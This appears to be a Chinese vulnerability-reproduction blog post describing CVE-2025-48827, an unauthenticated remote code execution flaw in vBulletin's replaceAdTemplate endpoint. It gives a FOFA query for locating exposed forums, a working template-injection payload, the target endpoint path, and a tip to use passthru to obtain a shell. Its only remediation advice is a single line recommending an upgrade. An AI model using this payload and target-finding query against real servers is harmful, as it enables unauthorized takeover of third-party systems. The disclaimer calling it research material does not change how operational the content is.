1. vBulletin 简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
vBulletin论坛
2.漏洞描述
vBulletin是一个商业论坛程序。2025年5月,互联网上披露CVE-2025-48827 vBulletin replaceAdTemplat 远程代码执行漏洞,攻击者可构造恶意请求在无需登录的情况下执行任意代码控制服务器。
CVE编号:CVE-2025-48827
CNNVD编号:
CNVD编号:
3.影响版本
vBulletin论坛
4.fofa查询语句
product="vBulletin"
5.漏洞复现
template参数的参数值:<vb:if condition='"var_dump"("tteesstt")'>
访问 https://xx.xx.xx.xx/ajax/render/ad_rce2
var_dump("tteesstt")函数执行成功。
这个漏洞有些函数是无法执行的,要getshell的话请使用passthru 函数
7.整改意见
升级至最新版本。
8.往期回顾
原文始发于微信公众号(南风漏洞复现文库):vBulletin replaceAdTemplat接口存在远程代码执行漏洞CVE-2025-48827 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论